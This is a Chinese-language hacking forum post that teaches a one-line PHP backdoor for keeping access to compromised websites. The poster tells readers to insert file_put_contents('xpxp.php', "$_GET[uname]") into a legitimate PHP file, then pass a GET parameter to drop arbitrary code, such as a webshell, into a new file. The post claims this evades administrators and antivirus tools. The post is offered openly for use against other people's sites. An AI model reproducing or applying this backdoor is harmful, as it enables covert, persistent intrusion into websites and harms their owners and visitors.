查看: 596|回复: 0

PHP_GET绕过躲避任何安全杀毒软件

[复制链接]
发表于 2015-8-30 06:48 | 显示全部楼层 |阅读模式
官方团队 2015-8-30 06:48 596 0 显示全部楼层
本人一直在用,躲避安全软件没有被删过了。<?phpfile_put_contents('xpxp...

经常拿到一些比较好的php站想要留住。很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。


现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。
<?php

file_put_contents('xpxp.php',"$_GET[uname]"); //此段代码插入它正常的PHP里面,最好插头部。

复制代码利用也很简单,在插入的PHP文件的后面加入get传参,
http://xxxxxxx.com/xxx.php?uname=插入内容,随便放,可以放一句话或者神马的,发挥自己想象了。

执行以后在插入的PHP当前文件夹下面生成一个xpxp.php 。


您需要登录后才可以回帖 登录 | 立即注册

本版积分规则 返回列表 发新帖

快速回复 返回顶部 返回列表